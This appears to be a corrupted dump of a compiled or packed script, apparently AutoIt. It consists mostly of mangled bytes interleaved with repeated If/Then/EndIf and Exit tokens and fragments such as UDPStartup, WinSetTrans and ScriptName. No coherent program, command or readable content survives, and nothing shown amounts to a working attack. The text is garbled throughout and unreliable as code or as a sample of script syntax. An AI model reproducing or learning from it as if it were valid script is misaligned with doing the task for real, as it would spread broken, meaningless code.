?j((((((((((If*If 0Then‰EndIf‰h‰If$v/83Then‡EndIf‰fÊIf 0Then‰EndIf*If 1Then‰EndIf‰h‰If 1TndIFileGN
=?*Exit$v=
$v=?*EErdIf*If ubo7n‰EndIf‰h‰If 1Then%EndIf 0’g#0îd4/2##
UDPStar00000nz#
=?*Exit$v$vExit=$=
#Uw#’g
$v2/4a=#Uw+f''If 0T‡Een‰Eíõ∂ú‰h‰If 1Then%EndIf 0’g#0îd4/2##
=?*Exit$v%EndIf*If 1Then‰EndIf‰h‰ng#2d#U$ThTen%EndIf*If 1Then‰EndIf‰h‰If 1Then%Uw#U$s=*Exit$v/8/ThChrEndIf‰fÊI2 0Then‰EndIf*If 1Then‰EndIf‰hThen%EndIf*If 1Then‰Exit$v/8h3een%EnWinSetTransn‰Exit$v/83Then‡EndIf‰fÊIf 0Then‰EndIf*If 1Then‰EndIf‰&‰If 1hen‰EndIFi$v=?*Exit$v=
$v=#Uw#’g#0‰h‰If 1Then%EndIf 0’g#0îd4/2##
UDPStar00000nz#
=?*Exit$v((((((((((@0criptName(((((((((((((((((((((((